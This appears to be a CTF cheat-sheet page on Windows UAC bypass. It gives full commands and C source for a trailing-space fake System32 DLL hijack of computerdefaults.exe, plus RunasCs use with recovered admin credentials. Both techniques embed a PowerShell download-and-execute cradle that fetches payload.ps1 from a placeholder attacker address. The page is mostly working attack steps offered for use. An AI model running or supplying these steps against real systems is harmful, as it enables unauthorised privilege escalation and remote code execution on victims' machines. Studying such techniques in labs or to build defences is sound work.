> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/windows/trick-0050/privilege-escalation-windows-uac-bypass.md).

# Uac Bypass

## UAC Bypass File System Junction DLL Hijacking

Create directories mimicking a trusted path using a trailing space trick. Windows handles file paths with trailing spaces in a non-standard way, allowing the creation of paths like `C:\Windows \System32`.

```bash
mkdir "C:\Windows \"
mkdir "C:\Windows \System32\"
copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe"
```

Create a malicious DLL (e.g., `legit.c`) that performs your desired action (like executing a payload). This example executes a powershell script:

```c
#include <windows.h>

int owned() {
    WinExec("powershell -c IEX (New-Object System.Net.Webclient).DownloadString(\'http://IP_ADDRESS:8000/payload.ps1\')", 0);
    exit(0);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    owned();
    return 0;
}
```

Compile the malicious DLL, ensuring it matches the architecture (e.g., x64) of the target binary. Tools like MinGW can be used for cross-compiling Windows DLLs on Linux. The `-shared` flag is used to create a shared library (DLL).

```bash
x86_64-w64-mingw32-gcc -shared -o legit.dll legit.c
```

Copy the compiled malicious DLL into the fake `System32` directory, naming it after a DLL legitimately loaded by the target binary. For `computerdefaults.exe`, `Secur32.dll` is a known target for DLL hijacking.

```bash
copy ".\legit.dll" "C:\Windows \System32\Secur32.dll"
```

Finally, execute the copied auto-elevating binary from the fake path. `computerdefaults.exe` is an auto-elevating binary, meaning it runs with elevated privileges without a standard UAC prompt. When executed from `C:\Windows \System32\`, it prioritizes loading DLLs from its current directory before searching the standard system directories. This allows the malicious `Secur32.dll` to be loaded instead of the legitimate one from the actual `C:\Windows\System32`, bypassing UAC and executing your code.

```bash
"C:\Windows \System32\computerdefaults.exe"
```

***

## UAC Bypass Via Runascs Credential Abuse

RunasCs is an utility to run specific processes with different permissions than the user’s current logon provides using explicit credentials. To bypass User Account Control (UAC) using `RunasCs`, you first need to obtain credentials for a user account that is part of the Administrators group. Transfer the `RunasCs.exe` utility to the target system.

If the user is in the Administrators group and UAC is enabled, without the `-b` flag, the process will be spawned with Medium Integrity Level. Using the `-b` flag, the process will be spawned with High Integrity Level, triggering the UAC bypass using the FodHelper method.

Execute the command specifying the username, password, the command to run with high integrity, and the `-b` flag:

```bash
RunasCs.exe <username> <password> "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://IP_ADDRESS/payload.ps1')" -b
```

Replace `<username>` and `<password>` with the recovered credentials, and the PowerShell command with the desired payload or command to execute in a high-integrity context. The `-b` flag is essential for the bypass functionality of RunasCs.

For domain users, you can specify the domain using the `-d` flag:

```bash
RunasCs.exe <username> <password> <command> -d <domain>
```

To bypass UAC for a domain user, combine the `-d` and `-b` flags:

```bash
RunasCs.exe <username> <password> <command> -d <domain> -b
```
